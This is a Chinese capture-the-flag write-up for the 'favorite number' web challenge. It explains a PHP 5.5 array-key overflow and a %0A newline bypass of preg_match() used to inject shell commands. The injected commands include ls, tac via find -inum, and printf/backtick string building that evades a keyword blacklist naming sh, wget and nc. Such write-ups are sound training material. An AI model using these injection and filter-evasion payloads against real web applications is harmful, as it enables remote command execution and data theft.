攻防世界web高手進階WP-favorite number
考點:
①php5.5 key陣列溢位
②%0A繞過preg_match()
打開鏈接是一道php原始碼審計問題
解題步驟:
①stuff === $array && $stuff[0] != 'admin’
②num必須是數字
③黑名單,禁止了敏感字符* ^ }{ \等和一些敏感函式
第一步讓stuff與陣列強相等,并且
s
t
u
f
f
數
組
的
第
一
個
元
素
與
stuff陣列的第一個元素與
stuff數組的第一個元素與array陣列的第一個元素不相等,
這里用到了key陣列溢位漏洞來繞過
參考:php5.5 key陣列溢位問題
payload:stuff[4294967296]=admin&stuff[1]=user繞過第一個
第二步,看到system()函式,就想到命令執行,常用的system(‘ls /’),但num必須是數字,不能出現字符,如何執行我們的命令呢?
正則匹配中^表示開頭, $表示結尾,\d表示數字字符,+表示前面匹配的物件最少出現一次,/im表示匹配多行并且不區分大小寫,
我們可以使用%0A來繞過,%0A表示換行,繞過原理是:preg_match()函式默認只匹配第一行,如果匹配完成(回傳0或者1)就回傳,所以將我們想要執行的命令放到第二行中
payload:num=123%0als
原理:
preg_match("/sh|wget|nc|python|php|perl|?|flag|}|cat|echo|*|^|]|\\|’|"||/i",$num)
黑名單中沒有過濾掉,可以 ls \查看根目錄下的檔案,發現flag檔案
之后就是查看flag中的內容了,我有三種思路:
第一種思路:用通配符繞過關鍵字,禁用了cat和flag關鍵字,所以cat /flag是用不了了,這時想到通配符*,但是題目中也過濾掉了*,? [ ^ 這四個字符在linux命令中都有統配符的作用,所以這個思路行不通,那么該如何定位到flag檔案呢?看下面這種思路
?表示匹配任意單個字符
*表示匹配任意長度字符
[]匹配指定范圍內的字符
[^]匹配指定范圍外的總府
第二種思路:ls -i命令,顯示檔案的節點號,思路就是通過檔案的節點號對檔案進行操作
payload: num=213%0als -i /
讀取flag內容
payload:num=123%0atac find / -inum 2766254 查看根目錄下節點號為2766254的檔案
因為過濾了cat,linux中還可以讀取檔案內容的命令有:less,more,head,tail,nl,od,tac
第三種思路:flag檔案名重定向到檔案中然后使用命令讀取
payload:num=123%0aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`
linux中>表示寫入到一個檔案中,如果該檔案不存在則新建
>>表示追加內容到檔案中,如果不存在則創建
printf /fla > /tmp/hello將字符/fla寫入/tmp下的hello檔案中,printf g >> /tmp/hello將字符g追加到/tmp下的hello檔案中,所以就在hello檔案中完成了字符的拼接,hello檔案的內容是/flag,
linux中反引號作用是,先執行反引號中的命令,將回傳結果賦值給一個變數,
`tac /tmp/hello`回傳/flag,tac `tac /tmp/hello` 就是tac /flag成功讀取到flag
flag:cyberpeace{562030ba653652e56183413067d95143}
希望能與各位師傅們多多交流,可私信,一定回,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/291473.html
標籤:其他
上一篇:計算機網路相關知識總結
下一篇:26、29、35